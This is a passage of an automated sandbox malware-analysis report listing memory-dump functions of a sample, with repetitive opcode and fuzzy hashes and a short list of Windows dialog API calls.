                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 80b5464d1f86bbee7ce4e76a4e016db7f53f73c51dfa0d7a6b432599ab280283
                                                                                                                                                                                                                          • Instruction ID: 0d8f4d3393d0481ae50864f03b86260b3a2d29a4cc0857dad26f79b69640588e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80b5464d1f86bbee7ce4e76a4e016db7f53f73c51dfa0d7a6b432599ab280283
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DC1A074E00218CFDB54DFA5C955B9DBBB2BF88300F6081A9D808AB365DB355E85CF51
                                                                                                                                                                                                                          Function 385E3D10 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: dce28267f369d5bca57da0207918b934e767202a34240067dfbfdc7145723fee
                                                                                                                                                                                                                          • Instruction ID: ae97baf9999168ee5b4ae8a2fcd27cc5fc6481b6bb0b37d92cb6218ee4723f26
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dce28267f369d5bca57da0207918b934e767202a34240067dfbfdc7145723fee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98C19F74E00218CFDB54DFA5C995B9DBBB2BF88300F6081A9D808AB365DB359A85CF50
                                                                                                                                                                                                                          Function 385E3008 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 482c697d08a26f59617370ef30fae0c0e5290e4b0846366ed1c903201cc66ae4
                                                                                                                                                                                                                          • Instruction ID: 71be0a7694d798a3c8a9a599cca96ab542a5597d9f8bd77e63480fd83421c118
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 482c697d08a26f59617370ef30fae0c0e5290e4b0846366ed1c903201cc66ae4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90C1AF74E00218CFEB55DFA5C995BDDBBB2BF88300F6081A9D808AB365DB355A85CF50
                                                                                                                                                                                                                          Function 385E2300 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0fb9e6cbeb35d2d016fc7d802b2057539d0c8d502477d69e320800b88956922b
                                                                                                                                                                                                                          • Instruction ID: 160fd3e6b4fb904f8fd2af6ae19b1e1863969bb77dc0ae79d8ccd229b928db05
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fb9e6cbeb35d2d016fc7d802b2057539d0c8d502477d69e320800b88956922b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52C1B174E00218CFDB54DFA5C955B9DBBB2BF88300F6081A9D408AB365DB359E85CF51
                                                                                                                                                                                                                          Function 385E6D38 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 03c7c4c68da8dad12757a38b374e819a9a6ac7f719a2e5901635e77027feecd1
                                                                                                                                                                                                                          • Instruction ID: 1ca2a1a822110c46ef8ab087bc1028a34e68c07fbe82841a756199b000e6eacb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03c7c4c68da8dad12757a38b374e819a9a6ac7f719a2e5901635e77027feecd1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCC19F74E01218CFDB54DFA5C995B9DBBB2BF88300F6081A9D808AB3A5DB355E85CF50
                                                                                                                                                                                                                          Function 385E9E38 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4ea1bbbccc222c3a175b62c97b5cc4027fc91f3ac8a7cb6e6a654cc3104f1851
                                                                                                                                                                                                                          • Instruction ID: 4dce3a32e072894942713185b1b37432db74eefc6d12f853bc88fe19c712732b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ea1bbbccc222c3a175b62c97b5cc4027fc91f3ac8a7cb6e6a654cc3104f1851
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86C1B074E00218CFDB55DFA5C995B9DBBB2BF88300F6081A9D808AB365DB359E85CF50
                                                                                                                                                                                                                          Function 385E9130 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 2a8e7fdab5092276a1ca8ecac285605da2f698e9548af3436a6c97e6be69e5e5
                                                                                                                                                                                                                          • Instruction ID: f85fd01d9b5729b6eb3b72330be118b73933fc05f80d610c4f4877b9eb6d6d08
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a8e7fdab5092276a1ca8ecac285605da2f698e9548af3436a6c97e6be69e5e5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5C1A074E00218CFDB54DFA5C955B9DBBB2FF88300F6080A9D849AB3A5DB359A85CF50
                                                                                                                                                                                                                          Function 385E5720 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c659074aede52a3af7768ba0d3db29bff9de7873ac87b97c1af4ff824b423277
                                                                                                                                                                                                                          • Instruction ID: e036bdd19b40ee49e29ca1e4fb01cee9e2697f4b67fe7a746f3fdd818ad3fb04
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c659074aede52a3af7768ba0d3db29bff9de7873ac87b97c1af4ff824b423277
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93C1B074E00218CFDB54DFA5C995BDDBBB2BF88300F6080A9D808AB3A5DB355A85CF50
                                                                                                                                                                                                                          Function 385E52C8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8c1a06571589cca5ad3c58369451acb230f4589beda49e257ff2a987b3b9473e
                                                                                                                                                                                                                          • Instruction ID: b720b781b1785c3ee0ee386e58908baf5511bb70592ceb9924acc4b307dc9ee6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c1a06571589cca5ad3c58369451acb230f4589beda49e257ff2a987b3b9473e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C1A074E01218CFDB54DFA5C995B9DBBB2BF88300F6081A9D808AB365DB359E85CF50
                                                                                                                                                                                                                          Function 385E45C0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 651f1eba85b36ff7c644720c9467383613296b3854c931216e48efae1f2dde32
                                                                                                                                                                                                                          • Instruction ID: ec4c01854fede82a0e6fb6e88cafd4057b8cd644389a7f7ee4dc9146f24d8ef7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 651f1eba85b36ff7c644720c9467383613296b3854c931216e48efae1f2dde32
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62C19074E01218CFEB54DFA5C955B9DBBB2BF88300F6081A9D808AB365DB355E85CF50
                                                                                                                                                                                                                          Function 385E15F8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3c19fb5b7af2bc58cd0183777798c9644a0714e617e62c7e381616f0eda20cb6
                                                                                                                                                                                                                          • Instruction ID: 633d866e4ff6e4f748847ca4a285818344394c628d2e5fe9a1f5814d0e9a8244
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c19fb5b7af2bc58cd0183777798c9644a0714e617e62c7e381616f0eda20cb6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BC1AF74E00218CFDB54DFA5C995B9DBBB2BF88300F6081A9D809AB365DB359E85CF50
                                                                                                                                                                                                                          Function 385E08F0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9b51cfc7253a8d4af41e3e634acdd40232eed5cd3f51be9c7848f642c003c14d
                                                                                                                                                                                                                          • Instruction ID: 18f6898d552fabb614a579870fe2aee3f6a871e9c2aac1d60b494a23014183b9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b51cfc7253a8d4af41e3e634acdd40232eed5cd3f51be9c7848f642c003c14d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9C1A074E01218CFEB54DFA5C995B9DBBB2BF88300F6081A9D808AB365DB355E85CF50
                                                                                                                                                                                                                          Function 385E82F0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b2aff5f34fa903e91310b39523c45c6bd04d13f32d7bea0acfa4ede00b37fd40
                                                                                                                                                                                                                          • Instruction ID: 03a05b83a5895643569b253323cbf27c3235ce50a748fe357c775406dc35572f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2aff5f34fa903e91310b39523c45c6bd04d13f32d7bea0acfa4ede00b37fd40
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71C19F74E00218CFDB54DFA5C955B9DBBB2BF88300F6081A9D808AB365DB359E85CF51
                                                                                                                                                                                                                          Function 385E75E8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: da9912dc9564008b0d8f9a5667136106fe3f71cd1ee665b624ef9c7eb90c4a03
                                                                                                                                                                                                                          • Instruction ID: b8c424962d38b67cd4786bcd434cfacd5e5327a7579ca565a34ca701994c34bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da9912dc9564008b0d8f9a5667136106fe3f71cd1ee665b624ef9c7eb90c4a03
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5C1AF74E00218CFEB55DFA5C955B9DBBB2BF88300F6080A9D808AB365DB355E85CF50
                                                                                                                                                                                                                          Function 385E99E0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3daf2ac9405623c62c949055740b6379bc1cbdad8c38ee93ed3fcfd3a4d794ca
                                                                                                                                                                                                                          • Instruction ID: ea1e5892c0ea6e6891ffeb3274ba57d372f69d16b51d646208a5b64a9dcd87de
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3daf2ac9405623c62c949055740b6379bc1cbdad8c38ee93ed3fcfd3a4d794ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29C19F74E00218CFDB54DFA5C995B9DBBB2FF88300F6081A9D848AB365DB355A85CF50
                                                                                                                                                                                                                          Function 385E0498 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4e4486c9f10c14f068591bb92c67ea2ae5b47e03a43baac89e5d3e6cb3117478
                                                                                                                                                                                                                          • Instruction ID: 7176e0e43384443dcea827f06bdba14a1da1cfafd60a76f63bb38954b371494a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e4486c9f10c14f068591bb92c67ea2ae5b47e03a43baac89e5d3e6cb3117478
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DC1A074E01218CFDB54DFA5C955B9DBBB2BF88300F6081A9D808AB365DB355E85CF50
                                                                                                                                                                                                                          Function 385E7E98 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c856cd914bbdb43783053fcaf17db32832d265d62daa703bb87a5ec9e2449005
                                                                                                                                                                                                                          • Instruction ID: 2e16c730d57bac4e6b8939d8158dcbd44c69566c7bf22ac06e4e0ce1b180fb4f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c856cd914bbdb43783053fcaf17db32832d265d62daa703bb87a5ec9e2449005
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09C19074E00218CFEB55DFA5C955B9DBBB2BF88300F6081A9D808AB365DB359E85CF50
                                                                                                                                                                                                                          Function 385E7190 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7d839f8fe17dc8cee8a118cfb6edacb6284c4020879847b6cfe0616e575df0d1
                                                                                                                                                                                                                          • Instruction ID: 21be5f93d4f73873e5e4ff726a2d917bbba6792ba813c1b9cd7783cd2ce118af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d839f8fe17dc8cee8a118cfb6edacb6284c4020879847b6cfe0616e575df0d1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EC19074E00218CFDB55DFA5C955B9DBBB2BF88300F6081A9D808AB365DB359E85CF50
                                                                                                                                                                                                                          Function 385E9588 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5ff549b3d49deaefa4f1c5d8cce40bd698954e94d5bcf052ad4491f45ef00cd5
                                                                                                                                                                                                                          • Instruction ID: 82f31fadfdd524039c13cb2c914077d9b37c970125eb1f3d076ea9ff007ca29e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ff549b3d49deaefa4f1c5d8cce40bd698954e94d5bcf052ad4491f45ef00cd5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52C1BF74E00218CFDB54DFA5C985BDDBBB2AF88300F6081A9D848AB365DB359E85CF50
                                                                                                                                                                                                                          Function 0011F67B Relevance: .2, Instructions: 193COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8ecdc416243bc4600f603b2882c1ada476bce74280d3233bf2ae4bd744e7a8d4
                                                                                                                                                                                                                          • Instruction ID: 4001a1c3c1762febcf9560fb4a22a2e4ed5d8c8c282a83595e2eb0fc87654585
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ecdc416243bc4600f603b2882c1ada476bce74280d3233bf2ae4bd744e7a8d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5A18B74A01228CFDB69DF64C854BD9BBB2BF4A304F5085EAD40AA7360DB359E85CF41
                                                                                                                                                                                                                          Function 0011F85B Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8b89a85b0c9f2b418f7eb95da0ef403354d5ac5025cee5226c991e703459f63b
                                                                                                                                                                                                                          • Instruction ID: feb25fa97ace69da1110d2a01ca87fd7fe79ebf80c70ff678e59c2ced63991f5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b89a85b0c9f2b418f7eb95da0ef403354d5ac5025cee5226c991e703459f63b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83517F74A01228CFDB69DF24D854BE9BBB2BF4A305F5085EAD40AA7350CB359E81CF41
                                                                                                                                                                                                                          Function 385DECC8 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972344550.00000000385D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385D0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385d0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0f2df3ef6eead7d4f393d29ec7d90ce1ac997b37aae7b4ae86edc6d543020f5f
                                                                                                                                                                                                                          • Instruction ID: 703b96fb2dd12674275c31056d7b3b90880e4f8b4e383c58d16d1c15adbd870b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f2df3ef6eead7d4f393d29ec7d90ce1ac997b37aae7b4ae86edc6d543020f5f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8641ADB4D022189FDB04DFA9D594BAEBBF1AF49304F1854A9D810BB290D7399A44CB94
                                                                                                                                                                                                                          Function 00405054 Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 004050B3
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004050C2
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004050FF
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405106
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405127
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405138
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040514B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405159
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040516C
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040518E
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004051A2
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004051C3
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051D3
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051EC
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004051F8
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004050D1
                                                                                                                                                                                                                            • Part of subcall function 00403F17: SendMessageA.USER32(00000028,?,?,00403D48), ref: 00403F25
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405214
